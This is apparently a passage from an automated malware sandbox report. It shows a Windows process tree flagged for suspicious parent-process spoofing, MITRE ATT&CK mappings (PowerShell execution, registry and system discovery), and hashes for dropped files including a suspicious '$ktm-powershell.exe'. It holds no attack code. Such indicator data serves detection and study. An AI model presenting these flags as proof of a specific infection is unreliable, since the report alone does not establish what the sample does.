C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4552

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:1712

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2820

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in System32 directory
PID:4888

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3496

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2988
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 556 -p 3176 -ip 3176
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:3044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE774.tmp.csv

Filesize
33KB

MD5
6519bc00e10a2fa4627f4b5b7e42eea7

SHA1
87ea0812b95e90449e1bcc7d552f5fef4d311529

SHA256
a003dc886a9b431f778c9c658b9574f3bdeb83ea1532dfe14289cbf29237071d

SHA512
dd8125a5fedc6f63a1ef753708cc42996bb2a55e147b84915996f93148b1088db478709cc8a29b7d5d9fe850e4cdccd68d51ce74b88e95d85dbe08968cb374d1

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE7A4.tmp.txt

Filesize
13KB

MD5
c0ec8d2056b67d6d50f4aeaaf431e55d

SHA1
9fc5ee104fe97aa5e0e23b81857ea6ea1f396a19

SHA256
22a5608e1bdef2077ae9cbfb3f2eda89a5d6a05632912b84da8bd326bd4b3ef8

SHA512
8ce6c5f93a1d23056894e90e8018ca5634a9fed8a43766c3eef20cdbdfc4c04833914878af1bf00724803a43bf7e01785b93d4d5abd28169d5da1cfb8387af9b

Download Submit
C:\Users\Admin\AppData\Local\$ktm-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fosfkuqf.pgd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/372-85-0x00007FFD8FBEF000-0x00007FFD8FBF0000-memory.dmp

Filesize
4KB

Download
memory/372-86-0x00007FFD4FBD0000-0x00007FFD4FBE0000-memory.dmp

Filesize
64KB

Download
memory/372-82-0x000002D5D4200000-0x000002D5D422C000-memory.dmp

Filesize
176KB

Download
memory/372-74-0x000002D5D4200000-0x000002D5D422C000-memory.dmp

Filesize
176KB

Download
memory/628-41-0x00007FFD8FBED000-0x00007FFD8FBEE000-memory.dmp

Filesize
4KB

Download
memory/628-30-0x0000021F41710000-0x0000021F41736000-memory.dmp

Filesize
152KB

Download
memory/628-42-0x00007FFD8FBEF000-0x00007FFD8FBF0000-memory.dmp

Filesize
4KB

Download
memory/628-40-0x0000021F41C60000-0x0000021F41C8C000-memory.dmp

Filesize
176KB

Download
memory/628-32-0x0000021F41C60000-0x0000021F41C8C000-memory.dmp

Filesize
176KB

Download
memory/628-31-0x0000021F41C60000-0x0000021F41C8C000-memory.dmp

Filesize
176KB

Download
memory/668-116-0x0000020DBDFC0000-0x0000020DBDFE6000-memory.dmp

Filesize
152KB

Download
memory/668-960-0x0000020DBDFC0000-0x0000020DBDFE6000-memory.dmp

Filesize
152KB

Download
memory/684-53-0x000002282BF70000-0x000002282BF9C000-memory.dmp

Filesize
176KB

Download
memory/684-56-0x00007FFD8FBED000-0x00007FFD8FBEE000-memory.dmp

Filesize
4KB

Download
memory/684-54-0x00007FFD4FBD0000-0x00007FFD4FBE0000-memory.dmp

Filesize
64KB

Download
memory/684-45-0x000002282BF70000-0x000002282BF9C000-memory.dmp

Filesize
176KB

Download
memory/748-100-0x0000015129380000-0x00000151293A6000-memory.dmp

Filesize
152KB

Download
memory/748-959-0x0000015129380000-0x00000151293A6000-memory.dmp

Filesize
152KB

Download
memory/748-89-0x00000151293B0000-0x00000151293DC000-memory.dmp

Filesize
176KB

Download
memory/976-67-0x000002C67B840000-0x000002C67B86C000-memory.dmp

Filesize
176KB

Download
memory/976-71-0x000002C67B810000-0x000002C67B836000-memory.dmp

Filesize
152KB

Download
memory/976-59-0x000002C67B840000-0x000002C67B86C000-memory.dmp

Filesize
176KB

Download
memory/976-72-0x00007FFD8FBEC000-0x00007FFD8FBED000-memory.dmp

Filesize
4KB

Download
memory/976-958-0x000002C67B810000-0x000002C67B836000-memory.dmp

Filesize
152KB

Download
memory/976-68-0x00007FFD4FBD0000-0x00007FFD4FBE0000-memory.dmp

Filesize
64KB

Download
memory/4296-115-0x00007FFD71883000-0x00007FFD71885000-memory.dmp

Filesize
8KB

Download
memory/4296-805-0x00007FFD71880000-0x00007FFD72341000-memory.dmp

Filesize
10.8MB

Download
memory/4296-24-0x00007FFD8F9C0000-0x00007FFD8FA7E000-memory.dmp

Filesize
760KB

Download
memory/4296-19-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/4296-18-0x0000017478B50000-0x0000017478BC4000-memory.dmp

Filesize
464KB

Download
memory/4296-25-0x0000017478FD0000-0x0000017479028000-memory.dmp

Filesize
352KB

Download
memory/4296-17-0x0000017478E20000-0x0000017478F10000-memory.dmp

Filesize
960KB

Download
memory/4296-16-0x00000174769C0000-0x00000174769CA000-memory.dmp

Filesize
40KB

Download
memory/4296-281-0x00000174791A0000-0x00000174791A8000-memory.dmp

Filesize
32KB

Download
memory/4296-26-0x0000017478BC0000-0x0000017478BC8000-memory.dmp

Filesize
32KB

Download
memory/4296-15-0x0000017476390000-0x000001747639E000-memory.dmp

Filesize
56KB

Download
memory/4296-12-0x00007FFD71880000-0x00007FFD72341000-memory.dmp

Filesize
10.8MB

Download
memory/4296-940-0x00007FFD71880000-0x00007FFD72341000-memory.dmp

Filesize
10.8MB

Download
memory/4296-957-0x00007FFD71880000-0x00007FFD72341000-memory.dmp

Filesize
10.8MB

Download
memory/4296-11-0x00007FFD71880000-0x00007FFD72341000-memory.dmp

Filesize
10.8MB

Download
memory/4296-6-0x0000017476350000-0x0000017476372000-memory.dmp

Filesize
136KB

Download
memory/4296-0-0x00007FFD71883000-0x00007FFD71885000-memory.dmp

Filesize
8KB

Download